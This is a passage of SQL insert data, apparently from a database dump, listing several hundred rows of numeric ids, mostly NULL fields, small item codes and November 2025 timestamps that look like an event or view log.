(21775, NULL, NULL, 2054, 1, '2025-11-08 23:33:40'),
(21776, NULL, NULL, 2060, 1, '2025-11-09 00:01:21'),
(21777, NULL, NULL, 2055, 1, '2025-11-09 02:02:37'),
(21778, NULL, NULL, 2055, 1, '2025-11-09 02:56:23'),
(21779, NULL, NULL, 2060, 1, '2025-11-09 04:06:24'),
(21780, NULL, NULL, 2063, 1, '2025-11-09 05:17:15'),
(21781, NULL, NULL, 2064, 1, '2025-11-09 06:08:17'),
(21782, NULL, NULL, 2064, 1, '2025-11-09 06:36:27'),
(21783, NULL, NULL, 2060, 1, '2025-11-09 07:30:27'),
(21784, NULL, NULL, 2059, 1, '2025-11-09 07:30:31'),
(21785, NULL, NULL, 2058, 1, '2025-11-09 08:51:19'),
(21786, 4233, NULL, 2064, 1, '2025-11-09 09:23:34'),
(21787, NULL, NULL, 2055, 1, '2025-11-09 11:25:36'),
(21788, NULL, NULL, 2058, 1, '2025-11-09 11:41:45'),
(21789, NULL, NULL, 2054, 1, '2025-11-09 12:52:12'),
(21790, NULL, NULL, 2054, 1, '2025-11-09 13:13:34'),
(21791, NULL, NULL, 2054, 1, '2025-11-09 14:31:55'),
(21792, NULL, NULL, 2061, 1, '2025-11-09 14:49:30'),
(21793, NULL, NULL, 2062, 1, '2025-11-09 15:01:51'),
(21794, NULL, NULL, 2055, 1, '2025-11-09 16:18:59'),
(21795, NULL, NULL, 2064, 1, '2025-11-09 16:19:13'),
(21796, NULL, NULL, 2064, 1, '2025-11-09 16:35:54'),
(21797, NULL, NULL, 2063, 1, '2025-11-09 17:08:46'),
(21798, NULL, NULL, 2054, 1, '2025-11-09 17:38:58'),
(21799, NULL, NULL, 2062, 1, '2025-11-09 18:30:44'),
(21800, NULL, NULL, 2064, 1, '2025-11-09 18:32:22'),
(21801, NULL, NULL, 2058, 1, '2025-11-09 18:39:04'),
(21802, NULL, NULL, 2061, 1, '2025-11-09 19:01:14'),
(21803, NULL, NULL, 2054, 1, '2025-11-09 19:07:59'),
(21804, NULL, NULL, 2054, 1, '2025-11-09 19:25:39'),
(21805, NULL, NULL, 2061, 1, '2025-11-09 21:30:54'),
(21806, NULL, NULL, 2054, 1, '2025-11-09 21:52:05'),
(21807, NULL, NULL, 2062, 1, '2025-11-09 22:10:02'),
(21808, NULL, NULL, 2064, 1, '2025-11-09 22:13:01'),
(21809, NULL, NULL, 2061, 1, '2025-11-09 22:19:35'),
(21810, NULL, NULL, 2060, 1, '2025-11-09 22:34:09'),
(21811, NULL, NULL, 2054, 1, '2025-11-09 22:41:24'),
(21812, NULL, NULL, 2061, 1, '2025-11-09 23:45:33'),
(21813, NULL, NULL, 2062, 1, '2025-11-10 01:32:00'),
(21814, NULL, NULL, 2062, 1, '2025-11-10 01:40:28'),
(21815, NULL, NULL, 2061, 1, '2025-11-10 01:45:41'),
(21816, NULL, NULL, 2062, 1, '2025-11-10 01:58:15'),
(21817, NULL, NULL, 2061, 1, '2025-11-10 02:02:33'),
(21818, NULL, NULL, 2062, 1, '2025-11-10 02:16:21'),
(21819, NULL, NULL, 2061, 1, '2025-11-10 02:22:03'),
(21820, NULL, NULL, 2064, 1, '2025-11-10 04:12:09'),
(21821, NULL, NULL, 2062, 1, '2025-11-10 04:19:45'),
(21822, NULL, NULL, 2062, 1, '2025-11-10 04:22:42'),
(21823, NULL, NULL, 2055, 1, '2025-11-10 04:46:35'),
(21824, NULL, NULL, 2062, 1, '2025-11-10 04:52:45'),
(21825, NULL, NULL, 2061, 1, '2025-11-10 04:58:29'),
(21826, NULL, NULL, 2062, 1, '2025-11-10 05:13:06'),
(21827, NULL, NULL, 2061, 1, '2025-11-10 05:24:02'),
(21828, NULL, NULL, 2061, 1, '2025-11-10 05:26:00'),
(21829, NULL, NULL, 2062, 1, '2025-11-10 05:55:50'),
(21830, NULL, NULL, 2061, 1, '2025-11-10 06:16:10'),
(21831, 4260, NULL, 2064, 1, '2025-11-10 07:17:42'),
(21832, NULL, NULL, 2062, 1, '2025-11-10 07:18:33'),
(21833, NULL, NULL, 2054, 1, '2025-11-10 08:03:55'),
(21834, NULL, NULL, 2055, 1, '2025-11-10 09:34:38'),
(21835, NULL, NULL, 2064, 1, '2025-11-10 09:34:41'),
(21836, NULL, NULL, 2061, 1, '2025-11-10 09:34:44'),
(21837, NULL, NULL, 2058, 1, '2025-11-10 09:34:47'),
(21838, NULL, NULL, 2063, 1, '2025-11-10 11:10:18'),
(21839, NULL, NULL, 2055, 1, '2025-11-10 11:10:20'),
(21840, NULL, NULL, 2053, 1, '2025-11-10 11:52:12'),
(21841, NULL, NULL, 2059, 1, '2025-11-10 14:02:10'),
(21842, NULL, NULL, 2062, 1, '2025-11-10 14:03:24'),
(21843, NULL, NULL, 2058, 1, '2025-11-10 14:04:15'),
(21844, NULL, NULL, 2063, 1, '2025-11-10 14:04:27'),
(21845, NULL, NULL, 2059, 1, '2025-11-10 14:53:59'),
(21846, NULL, NULL, 2055, 1, '2025-11-10 15:14:43'),
(21847, NULL, NULL, 2059, 1, '2025-11-10 16:12:49'),
(21848, NULL, NULL, 2060, 1, '2025-11-10 16:45:50'),
(21849, NULL, NULL, 2055, 1, '2025-11-10 16:59:12'),
(21850, NULL, NULL, 2063, 1, '2025-11-10 17:07:00'),
(21851, NULL, NULL, 2064, 1, '2025-11-10 17:12:22'),
(21852, NULL, NULL, 2062, 1, '2025-11-10 18:09:07'),
(21853, NULL, NULL, 2060, 1, '2025-11-10 18:25:43'),
(21854, NULL, NULL, 2064, 1, '2025-11-10 18:33:39'),
(21855, NULL, NULL, 2054, 1, '2025-11-10 18:55:56'),
(21856, NULL, NULL, 2060, 1, '2025-11-10 19:29:05'),
(21857, NULL, NULL, 2054, 1, '2025-11-10 19:30:32'),
(21858, NULL, NULL, 2058, 1, '2025-11-10 19:45:34'),
(21859, NULL, NULL, 2054, 1, '2025-11-10 19:45:39'),
(21860, NULL, NULL, 2054, 1, '2025-11-10 20:00:21'),
(21861, NULL, NULL, 2062, 1, '2025-11-10 21:08:18'),
(21862, NULL, NULL, 2064, 1, '2025-11-10 22:19:24'),
(21863, NULL, NULL, 2062, 1, '2025-11-10 22:19:29'),
(21864, NULL, NULL, 2064, 1, '2025-11-10 22:26:19'),
(21865, NULL, NULL, 2054, 1, '2025-11-10 22:39:24'),
(21866, NULL, NULL, 2061, 1, '2025-11-11 00:36:12'),
(21867, NULL, NULL, 2058, 1, '2025-11-11 00:58:21'),
(21868, NULL, NULL, 2058, 1, '2025-11-11 04:07:24'),
(21869, NULL, NULL, 2060, 1, '2025-11-11 04:17:08'),
(21870, NULL, NULL, 2064, 1, '2025-11-11 04:44:12'),
(21871, NULL, NULL, 2060, 1, '2025-11-11 05:39:31'),
(21872, NULL, NULL, 2060, 1, '2025-11-11 07:18:53'),
(21873, NULL, NULL, 2054, 1, '2025-11-11 07:53:24'),
(21874, NULL, NULL, 2054, 1, '2025-11-11 09:49:05'),
(21875, NULL, NULL, 2064, 1, '2025-11-11 10:05:43'),
(21876, NULL, NULL, 2060, 1, '2025-11-11 11:05:05'),
(21877, NULL, NULL, 2058, 1, '2025-11-11 13:17:19'),
(21878, NULL, NULL, 2060, 1, '2025-11-11 14:26:03'),
(21879, NULL, NULL, 2064, 1, '2025-11-11 16:20:50'),
(21880, NULL, NULL, 2064, 1, '2025-11-11 19:04:07'),
(21881, NULL, NULL, 2058, 1, '2025-11-11 19:40:50'),
(21882, NULL, NULL, 2054, 1, '2025-11-11 20:22:12'),
(21883, NULL, NULL, 2059, 1, '2025-11-11 20:22:13'),
(21884, NULL, NULL, 2058, 1, '2025-11-11 20:22:13'),
(21885, NULL, NULL, 2064, 1, '2025-11-11 20:22:13'),
(21886, NULL, NULL, 2062, 1, '2025-11-11 20:22:13'),
(21887, NULL, NULL, 2055, 1, '2025-11-11 20:22:13'),
(21888, NULL, NULL, 2060, 1, '2025-11-11 20:22:14'),
(21889, NULL, NULL, 2063, 1, '2025-11-11 20:22:14'),
(21890, NULL, NULL, 2061, 1, '2025-11-11 20:22:14'),
(21891, NULL, NULL, 2054, 1, '2025-11-11 21:18:19'),
(21892, NULL, NULL, 2060, 1, '2025-11-11 21:33:14'),
(21893, NULL, NULL, 2060, 1, '2025-11-12 02:02:18'),
(21894, NULL, NULL, 2058, 1, '2025-11-12 02:20:11'),
(21895, NULL, NULL, 2053, 1, '2025-11-12 02:37:59'),
(21896, NULL, NULL, 2055, 1, '2025-11-12 02:51:03'),
(21897, NULL, NULL, 2064, 1, '2025-11-12 02:54:25'),
(21898, NULL, NULL, 2063, 1, '2025-11-12 04:13:46'),
(21899, NULL, NULL, 2054, 1, '2025-11-12 04:21:06'),
(21900, NULL, NULL, 2054, 1, '2025-11-12 04:49:35'),
(21901, NULL, NULL, 2063, 1, '2025-11-12 05:34:34'),
(21902, NULL, NULL, 2054, 1, '2025-11-12 06:07:30'),
(21903, NULL, NULL, 2064, 1, '2025-11-12 06:54:58'),
(21904, NULL, NULL, 2059, 1, '2025-11-12 07:57:28'),
(21905, NULL, NULL, 2064, 1, '2025-11-12 10:13:49'),
(21906, NULL, NULL, 2063, 1, '2025-11-12 10:25:31'),
(21907, NULL, NULL, 2055, 1, '2025-11-12 10:37:32'),
(21908, NULL, NULL, 2059, 1, '2025-11-12 10:51:46'),
(21909, NULL, NULL, 2061, 1, '2025-11-12 11:06:28'),
(21910, NULL, NULL, 2062, 1, '2025-11-12 11:12:55'),
(21911, NULL, NULL, 2064, 1, '2025-11-12 13:20:31'),
(21912, NULL, NULL, 2054, 1, '2025-11-12 14:29:14'),
(21913, NULL, NULL, 2064, 1, '2025-11-12 18:39:27'),
(21914, NULL, NULL, 2063, 1, '2025-11-12 18:54:03'),
(21915, NULL, NULL, 2062, 1, '2025-11-12 19:29:34'),
(21916, NULL, NULL, 2064, 1, '2025-11-12 19:30:48'),
(21917, NULL, NULL, 2064, 1, '2025-11-12 19:32:53'),
(21918, NULL, NULL, 2054, 1, '2025-11-12 19:35:48'),
(21919, NULL, NULL, 2064, 1, '2025-11-12 20:10:54'),
(21920, NULL, NULL, 2060, 1, '2025-11-12 20:17:24'),
(21921, NULL, NULL, 2054, 1, '2025-11-12 21:06:06'),
(21922, NULL, NULL, 2060, 1, '2025-11-12 21:08:45'),
(21923, NULL, NULL, 2060, 1, '2025-11-12 21:13:32'),
(21924, NULL, NULL, 2064, 1, '2025-11-12 21:15:20'),
(21925, NULL, NULL, 2064, 1, '2025-11-12 21:28:55'),
(21926, NULL, NULL, 2064, 1, '2025-11-12 23:01:14'),
(21927, NULL, NULL, 2063, 1, '2025-11-13 01:05:40'),
(21928, NULL, NULL, 2062, 1, '2025-11-13 02:22:15'),
(21929, NULL, NULL, 2063, 1, '2025-11-13 03:32:06'),
(21930, NULL, NULL, 2062, 1, '2025-11-13 03:55:57'),
(21931, NULL, NULL, 2061, 1, '2025-11-13 04:07:12'),
(21932, NULL, NULL, 2058, 1, '2025-11-13 04:18:25'),
(21933, NULL, NULL, 2063, 1, '2025-11-13 07:23:19'),
(21934, NULL, NULL, 2055, 1, '2025-11-13 07:40:25'),
(21935, NULL, NULL, 2060, 1, '2025-11-13 10:14:57'),
(21936, NULL, NULL, 2064, 1, '2025-11-13 10:45:30'),
(21937, NULL, NULL, 2055, 1, '2025-11-13 11:40:11'),
(21938, NULL, NULL, 2054, 1, '2025-11-13 11:51:47'),
(21939, NULL, NULL, 2054, 1, '2025-11-13 12:50:33'),
(21940, NULL, NULL, 2064, 1, '2025-11-13 12:59:00'),
(21941, NULL, NULL, 2064, 1, '2025-11-13 13:09:32'),
(21942, NULL, NULL, 2063, 1, '2025-11-13 13:22:30'),
(21943, NULL, NULL, 2059, 1, '2025-11-13 13:39:11'),
(21944, NULL, NULL, 2060, 1, '2025-11-13 15:59:56'),
(21945, NULL, NULL, 2054, 1, '2025-11-13 17:33:39'),
(21946, NULL, NULL, 2059, 1, '2025-11-13 17:47:32'),
(21947, NULL, NULL, 2054, 1, '2025-11-13 18:57:21'),
(21948, NULL, NULL, 2064, 1, '2025-11-13 19:20:52'),
(21949, NULL, NULL, 2053, 1, '2025-11-13 20:35:22'),
(21950, NULL, NULL, 2062, 1, '2025-11-13 22:51:55'),
(21951, NULL, NULL, 2063, 1, '2025-11-13 22:52:03'),
(21952, NULL, NULL, 2061, 1, '2025-11-13 22:52:08'),
(21953, NULL, NULL, 2058, 1, '2025-11-13 22:56:39'),
(21954, NULL, NULL, 2060, 1, '2025-11-13 23:58:01'),
(21955, NULL, NULL, 2060, 1, '2025-11-14 03:23:55'),
(21956, NULL, NULL, 2063, 1, '2025-11-14 03:24:10'),
(21957, NULL, NULL, 2061, 1, '2025-11-14 03:57:22'),
(21958, NULL, NULL, 2060, 1, '2025-11-14 04:02:11'),
(21959, NULL, NULL, 2060, 1, '2025-11-14 05:59:10'),
(21960, NULL, NULL, 2059, 1, '2025-11-14 06:13:47'),
(21961, NULL, NULL, 2060, 1, '2025-11-14 06:51:45'),
(21962, NULL, NULL, 2059, 1, '2025-11-14 10:26:03'),
(21963, NULL, NULL, 2054, 1, '2025-11-14 12:02:09'),
(21964, NULL, NULL, 2055, 1, '2025-11-14 12:02:12'),
(21965, NULL, NULL, 2063, 1, '2025-11-14 12:02:14'),
(21966, NULL, NULL, 2060, 1, '2025-11-14 12:02:15'),
(21967, NULL, NULL, 2058, 1, '2025-11-14 12:02:15'),
(21968, NULL, NULL, 2059, 1, '2025-11-14 12:02:16'),
(21969, NULL, NULL, 2064, 1, '2025-11-14 12:02:18'),
(21970, NULL, NULL, 2061, 1, '2025-11-14 12:02:21'),
(21971, NULL, NULL, 2062, 1, '2025-11-14 12:02:22'),
(21972, NULL, NULL, 2064, 1, '2025-11-14 12:47:24'),
(21973, NULL, NULL, 2060, 1, '2025-11-14 13:21:45'),
(21974, NULL, NULL, 2064, 1, '2025-11-14 13:29:45'),
(21975, NULL, NULL, 2059, 1, '2025-11-14 13:32:28'),
(21976, NULL, NULL, 2054, 1, '2025-11-14 13:59:57'),
(21977, NULL, NULL, 2062, 1, '2025-11-14 14:04:22'),
(21978, NULL, NULL, 2061, 1, '2025-11-14 14:49:54'),
(21979, NULL, NULL, 2064, 1, '2025-11-14 17:10:40'),
(21980, NULL, NULL, 2058, 1, '2025-11-14 17:50:15'),
(21981, NULL, NULL, 2059, 1, '2025-11-14 19:11:03'),
(21982, NULL, NULL, 2062, 1, '2025-11-14 19:27:01'),
(21983, NULL, NULL, 2064, 1, '2025-11-14 20:38:50'),
(21984, NULL, NULL, 2053, 1, '2025-11-14 20:39:54'),
(21985, NULL, NULL, 2063, 1, '2025-11-14 21:37:15'),
(21986, NULL, NULL, 2062, 1, '2025-11-14 22:53:52'),
(21987, NULL, NULL, 2058, 1, '2025-11-14 23:32:31'),
(21988, NULL, NULL, 2054, 1, '2025-11-15 00:13:05'),
(21989, NULL, NULL, 2060, 1, '2025-11-15 00:25:16'),
(21990, NULL, NULL, 2062, 1, '2025-11-15 00:42:18'),
(21991, NULL, NULL, 2064, 1, '2025-11-15 01:46:37'),
(21992, NULL, NULL, 2054, 1, '2025-11-15 01:57:16'),
(21993, NULL, NULL, 2064, 1, '2025-11-15 02:38:43'),
(21994, NULL, NULL, 2064, 1, '2025-11-15 05:29:18'),
(21995, NULL, NULL, 2059, 1, '2025-11-15 05:55:48'),
(21996, NULL, NULL, 2060, 1, '2025-11-15 07:01:19'),
(21997, NULL, NULL, 2058, 1, '2025-11-15 09:10:54'),
(21998, NULL, NULL, 2060, 1, '2025-11-15 09:58:56'),
(21999, NULL, NULL, 2054, 1, '2025-11-15 10:21:00'),
(22000, NULL, NULL, 2064, 1, '2025-11-15 10:28:36'),
(22001, NULL, NULL, 2061, 1, '2025-11-15 11:26:49'),
(22002, NULL, NULL, 2055, 1, '2025-11-15 12:18:21'),
(22003, NULL, NULL, 2064, 1, '2025-11-15 13:31:26'),
(22004, NULL, NULL, 2064, 1, '2025-11-15 14:20:28'),
(22005, NULL, NULL, 2060, 1, '2025-11-15 14:28:47'),
(22006, NULL, NULL, 2063, 1, '2025-11-15 15:06:33'),
(22007, NULL, NULL, 2063, 1, '2025-11-15 15:33:23'),
(22008, NULL, NULL, 2054, 1, '2025-11-15 16:03:37'),
(22009, NULL, NULL, 2063, 1, '2025-11-15 16:03:49'),
(22010, NULL, NULL, 2055, 1, '2025-11-15 16:03:56'),
(22011, NULL, NULL, 2060, 1, '2025-11-15 16:04:01'),
(22012, NULL, NULL, 2058, 1, '2025-11-15 16:04:31'),
(22013, NULL, NULL, 2059, 1, '2025-11-15 16:04:48'),
(22014, NULL, NULL, 2064, 1, '2025-11-15 16:04:50'),
(22015, NULL, NULL, 2062, 1, '2025-11-15 16:04:52'),
(22016, NULL, NULL, 2061, 1, '2025-11-15 16:05:20'),
(22017, NULL, NULL, 2064, 1, '2025-11-15 16:06:16'),
(22018, NULL, NULL, 2054, 1, '2025-11-15 18:02:04'),
(22019, NULL, NULL, 2060, 1, '2025-11-15 18:34:25'),
(22020, NULL, NULL, 2062, 1, '2025-11-15 18:42:12'),
(22021, NULL, NULL, 2064, 1, '2025-11-15 18:43:30'),
(22022, NULL, NULL, 2054, 1, '2025-11-15 18:44:57'),
(22023, NULL, NULL, 2063, 1, '2025-11-15 21:03:08'),
(22024, NULL, NULL, 2055, 1, '2025-11-15 21:30:09'),
(22025, NULL, NULL, 2060, 1, '2025-11-15 21:38:43'),
(22026, NULL, NULL, 2054, 1, '2025-11-15 22:45:41'),
(22027, NULL, NULL, 2064, 1, '2025-11-16 01:41:50'),
(22028, NULL, NULL, 2064, 1, '2025-11-16 01:45:52'),
(22029, NULL, NULL, 2063, 1, '2025-11-16 02:34:14'),
(22030, NULL, NULL, 2053, 1, '2025-11-16 02:39:32'),
(22031, NULL, NULL, 2058, 1, '2025-11-16 02:59:32'),
(22032, NULL, NULL, 2059, 1, '2025-11-16 03:01:35'),
(22033, NULL, NULL, 2064, 1, '2025-11-16 04:47:56'),
(22034, NULL, NULL, 2064, 1, '2025-11-16 04:50:02'),
(22035, NULL, NULL, 2060, 1, '2025-11-16 05:24:53'),
(22036, NULL, NULL, 2061, 1, '2025-11-16 05:36:55'),
(22037, NULL, NULL, 2064, 1, '2025-11-16 05:59:35'),
(22038, NULL, NULL, 2059, 1, '2025-11-16 07:22:59'),
(22039, NULL, NULL, 2060, 1, '2025-11-16 07:23:02'),
(22040, NULL, NULL, 2054, 1, '2025-11-16 08:17:02'),
(22041, NULL, NULL, 2061, 1, '2025-11-16 08:29:26'),
(22042, NULL, NULL, 2062, 1, '2025-11-16 09:22:39'),
(22043, NULL, NULL, 2064, 1, '2025-11-16 10:26:48'),
(22044, NULL, NULL, 2064, 1, '2025-11-16 14:58:11'),
(22045, NULL, NULL, 2060, 1, '2025-11-16 15:17:34'),
(22046, NULL, NULL, 2054, 1, '2025-11-16 15:24:07'),
(22047, NULL, NULL, 2059, 1, '2025-11-16 15:53:29'),
(22048, NULL, NULL, 2053, 1, '2025-11-16 17:34:06'),
(22049, NULL, NULL, 2062, 1, '2025-11-16 18:43:44'),
(22050, NULL, NULL, 2060, 1, '2025-11-16 20:40:45'),
(22051, NULL, NULL, 2063, 1, '2025-11-16 21:20:43'),
(22052, NULL, NULL, 2060, 1, '2025-11-16 23:54:17'),
(22053, NULL, NULL, 2063, 1, '2025-11-17 00:05:57'),
(22054, NULL, NULL, 2060, 1, '2025-11-17 00:08:03'),
(22055, NULL, NULL, 2055, 1, '2025-11-17 00:27:24'),
(22056, NULL, NULL, 2058, 1, '2025-11-17 00:37:05'),
(22057, NULL, NULL, 2060, 1, '2025-11-17 01:23:04'),
(22058, NULL, NULL, 2063, 1, '2025-11-17 01:30:47'),
(22059, NULL, NULL, 2055, 1, '2025-11-17 01:48:59'),
(22060, NULL, NULL, 2058, 1, '2025-11-17 01:51:30'),
(22061, NULL, NULL, 2058, 1, '2025-11-17 02:19:42'),
(22062, NULL, NULL, 2055, 1, '2025-11-17 02:34:06'),
(22063, NULL, NULL, 2064, 1, '2025-11-17 02:55:27'),
(22064, NULL, NULL, 2061, 1, '2025-11-17 03:50:38'),
(22065, NULL, NULL, 2061, 1, '2025-11-17 03:55:11'),
(22066, NULL, NULL, 2062, 1, '2025-11-17 04:32:03'),
(22067, NULL, NULL, 2060, 1, '2025-11-17 04:59:17'),
(22068, NULL, NULL, 2054, 1, '2025-11-17 05:45:09'),
(22069, NULL, NULL, 2062, 1, '2025-11-17 05:53:47'),
(22070, NULL, NULL, 2059, 1, '2025-11-17 05:59:32'),
(22071, NULL, NULL, 2064, 1, '2025-11-17 06:11:27'),
(22072, NULL, NULL, 2054, 1, '2025-11-17 07:10:10'),
(22073, NULL, NULL, 2064, 1, '2025-11-17 08:46:17'),
(22074, NULL, NULL, 2063, 1, '2025-11-17 09:07:03'),
(22075, NULL, NULL, 2059, 1, '2025-11-17 14:49:30'),
(22076, NULL, NULL, 2061, 1, '2025-11-17 15:33:37'),
(22077, NULL, NULL, 2064, 1, '2025-11-17 16:02:17'),
(22078, NULL, NULL, 2062, 1, '2025-11-17 19:33:46'),
(22079, NULL, NULL, 2054, 1, '2025-11-17 19:39:46'),
(22080, NULL, NULL, 2058, 1, '2025-11-17 19:39:49'),
(22081, NULL, NULL, 2054, 1, '2025-11-17 20:23:17'),
(22082, NULL, NULL, 2062, 1, '2025-11-17 21:09:13'),
(22083, NULL, NULL, 2053, 1, '2025-11-17 22:37:14'),
(22084, NULL, NULL, 2058, 1, '2025-11-17 23:00:05'),
(22085, NULL, NULL, 2064, 1, '2025-11-17 23:20:58'),
(22086, NULL, NULL, 2059, 1, '2025-11-17 23:42:24'),
(22087, NULL, NULL, 2063, 1, '2025-11-18 00:18:30'),
(22088, NULL, NULL, 2055, 1, '2025-11-18 00:20:35'),
(22089, NULL, NULL, 2059, 1, '2025-11-18 00:36:37'),
(22090, NULL, NULL, 2062, 1, '2025-11-18 00:38:09'),
(22091, NULL, NULL, 2058, 1, '2025-11-18 00:38:11'),
(22092, NULL, NULL, 2063, 1, '2025-11-18 00:51:02'),
(22093, NULL, NULL, 2053, 1, '2025-11-18 00:54:19'),
(22094, NULL, NULL, 2061, 1, '2025-11-18 00:54:32'),
(22095, NULL, NULL, 2058, 1, '2025-11-18 00:55:10'),
(22096, NULL, NULL, 2059, 1, '2025-11-18 00:55:15'),
(22097, NULL, NULL, 2060, 1, '2025-11-18 00:57:21'),
(22098, NULL, NULL, 2064, 1, '2025-11-18 01:01:12'),
(22099, NULL, NULL, 2054, 1, '2025-11-18 02:14:38'),
(22100, NULL, NULL, 2062, 1, '2025-11-18 02:30:12'),
(22101, 4537, NULL, 2064, 1, '2025-11-18 03:10:57'),
(22102, NULL, NULL, 2054, 1, '2025-11-18 03:48:24'),
(22103, NULL, NULL, 2053, 1, '2025-11-18 04:27:19'),
(22104, NULL, NULL, 2064, 1, '2025-11-18 04:44:28'),
(22105, NULL, NULL, 2061, 1, '2025-11-18 04:52:22'),
(22106, NULL, NULL, 2060, 1, '2025-11-18 06:37:46'),
(22107, NULL, NULL, 2064, 1, '2025-11-18 07:34:51'),
(22108, NULL, NULL, 2063, 1, '2025-11-18 07:45:08'),
(22109, NULL, NULL, 2064, 1, '2025-11-18 09:29:33'),
(22110, NULL, NULL, 2061, 1, '2025-11-18 09:44:28'),
(22111, NULL, NULL, 2058, 1, '2025-11-18 10:05:36'),
(22112, NULL, NULL, 2064, 1, '2025-11-18 10:35:58'),
(22113, NULL, NULL, 2058, 1, '2025-11-18 11:04:26'),
(22114, NULL, NULL, 2054, 1, '2025-11-18 11:40:56'),
(22115, NULL, NULL, 2053, 1, '2025-11-18 12:07:47'),
(22116, NULL, NULL, 2064, 1, '2025-11-18 12:56:33'),
(22117, NULL, NULL, 2064, 1, '2025-11-18 13:48:30'),
(22118, NULL, NULL, 2060, 1, '2025-11-18 13:53:30'),
(22119, NULL, NULL, 2064, 1, '2025-11-18 14:55:44'),
(22120, NULL, NULL, 2055, 1, '2025-11-18 16:14:13'),
(22121, NULL, NULL, 2054, 1, '2025-11-18 16:23:24'),
(22122, NULL, NULL, 2055, 1, '2025-11-18 17:03:55'),
(22123, NULL, NULL, 2059, 1, '2025-11-18 17:43:55'),
(22124, NULL, NULL, 2054, 1, '2025-11-18 18:00:43'),
(22125, NULL, NULL, 2062, 1, '2025-11-18 18:39:15'),
(22126, NULL, NULL, 2064, 1, '2025-11-18 18:40:37'),
(22127, NULL, NULL, 2063, 1, '2025-11-18 18:54:47'),
(22128, NULL, NULL, 2060, 1, '2025-11-18 19:02:35'),
(22129, NULL, NULL, 2062, 1, '2025-11-18 19:46:57'),
(22130, NULL, NULL, 2054, 1, '2025-11-18 21:22:44'),
(22131, NULL, NULL, 2064, 1, '2025-11-18 22:21:27'),
(22132, NULL, NULL, 2061, 1, '2025-11-18 23:09:10'),
(22133, NULL, NULL, 2060, 1, '2025-11-19 01:30:20'),
(22134, NULL, NULL, 2058, 1, '2025-11-19 02:04:24'),
(22135, NULL, NULL, 2058, 1, '2025-11-19 02:04:25'),
(22136, NULL, NULL, 2058, 1, '2025-11-19 02:04:26'),
(22137, NULL, NULL, 2058, 1, '2025-11-19 02:04:26'),
(22138, NULL, NULL, 2058, 1, '2025-11-19 02:04:26'),
(22139, NULL, NULL, 2058, 1, '2025-11-19 02:04:26'),
(22140, NULL, NULL, 2058, 1, '2025-11-19 02:04:26'),
(22141, NULL, NULL, 2058, 1, '2025-11-19 02:04:29'),
(22142, NULL, NULL, 2058, 1, '2025-11-19 02:04:34'),
(22143, NULL, NULL, 2058, 1, '2025-11-19 02:04:36'),
(22144, NULL, NULL, 2058, 1, '2025-11-19 02:04:53'),
(22145, NULL, NULL, 2060, 1, '2025-11-19 02:14:04'),
(22146, NULL, NULL, 2058, 1, '2025-11-19 03:04:16'),
(22147, NULL, NULL, 2058, 1, '2025-11-19 03:04:21'),
(22148, NULL, NULL, 2058, 1, '2025-11-19 03:04:33'),
(22149, NULL, NULL, 2058, 1, '2025-11-19 03:05:49'),
(22150, NULL, NULL, 2058, 1, '2025-11-19 03:06:24'),
(22151, NULL, NULL, 2058, 1, '2025-11-19 03:09:34'),
(22152, NULL, NULL, 2058, 1, '2025-11-19 03:10:25'),
(22153, NULL, NULL, 2054, 1, '2025-11-19 03:49:12'),
(22154, NULL, NULL, 2064, 1, '2025-11-19 05:18:33'),
(22155, NULL, NULL, 2064, 1, '2025-11-19 06:28:53'),
(22156, NULL, NULL, 2064, 1, '2025-11-19 07:14:31'),
(22157, NULL, NULL, 2054, 1, '2025-11-19 11:44:00'),
(22158, NULL, NULL, 2058, 1, '2025-11-19 12:02:34'),
(22159, NULL, NULL, 2058, 1, '2025-11-19 12:02:34'),
(22160, NULL, NULL, 2054, 1, '2025-11-19 12:47:49'),
(22161, NULL, NULL, 2058, 1, '2025-11-19 13:10:55'),
(22162, NULL, NULL, 2064, 1, '2025-11-19 13:40:02'),
(22163, NULL, NULL, 2060, 1, '2025-11-19 14:15:30'),
(22164, NULL, NULL, 2063, 1, '2025-11-19 14:37:37'),
(22165, NULL, NULL, 2060, 1, '2025-11-19 15:06:39'),
(22166, NULL, NULL, 2064, 1, '2025-11-19 15:26:45'),
(22167, NULL, NULL, 2063, 1, '2025-11-19 15:38:57'),
(22168, NULL, NULL, 2054, 1, '2025-11-19 18:48:55'),
(22169, NULL, NULL, 2059, 1, '2025-11-19 19:19:23'),
(22170, NULL, NULL, 2054, 1, '2025-11-19 19:19:25'),
(22171, NULL, NULL, 2058, 1, '2025-11-19 19:19:26'),
(22172, NULL, NULL, 2064, 1, '2025-11-19 19:19:27'),
(22173, NULL, NULL, 2055, 1, '2025-11-19 19:19:28'),
(22174, NULL, NULL, 2060, 1, '2025-11-19 19:19:31'),
(22175, NULL, NULL, 2062, 1, '2025-11-19 19:19:35'),
(22176, NULL, NULL, 2063, 1, '2025-11-19 19:19:36'),
(22177, NULL, NULL, 2064, 1, '2025-11-19 20:01:15'),
(22178, NULL, NULL, 2062, 1, '2025-11-19 22:44:03'),
(22179, NULL, NULL, 2062, 1, '2025-11-19 23:44:40'),
(22180, NULL, NULL, 2062, 1, '2025-11-20 00:52:50'),
(22181, NULL, NULL, 2062, 1, '2025-11-20 01:44:30'),
(22182, NULL, NULL, 2058, 1, '2025-11-20 02:25:36'),
(22183, NULL, NULL, 2062, 1, '2025-11-20 02:44:34'),
(22184, NULL, NULL, 2062, 1, '2025-11-20 03:03:36'),
(22185, NULL, NULL, 2053, 1, '2025-11-20 03:03:40'),
(22186, NULL, NULL, 2062, 1, '2025-11-20 03:05:03'),
(22187, NULL, NULL, 2055, 1, '2025-11-20 03:35:42'),
(22188, NULL, NULL, 2062, 1, '2025-11-20 04:14:40'),
(22189, NULL, NULL, 2060, 1, '2025-11-20 04:24:53'),
(22190, NULL, NULL, 2060, 1, '2025-11-20 04:41:22'),
(22191, NULL, NULL, 2054, 1, '2025-11-20 05:08:31'),
(22192, NULL, NULL, 2062, 1, '2025-11-20 05:15:48'),
(22193, NULL, NULL, 2062, 1, '2025-11-20 05:17:48'),
(22194, NULL, NULL, 2061, 1, '2025-11-20 05:38:50'),
(22195, NULL, NULL, 2054, 1, '2025-11-20 05:41:35'),
(22196, NULL, NULL, 2061, 1, '2025-11-20 06:06:12'),
(22197, NULL, NULL, 2062, 1, '2025-11-20 06:08:10'),
(22198, NULL, NULL, 2062, 1, '2025-11-20 06:41:52'),
(22199, NULL, NULL, 2061, 1, '2025-11-20 06:42:29'),
(22200, NULL, NULL, 2061, 1, '2025-11-20 07:08:46'),
(22201, NULL, NULL, 2062, 1, '2025-11-20 07:17:32'),
(22202, NULL, NULL, 2061, 1, '2025-11-20 07:17:35'),
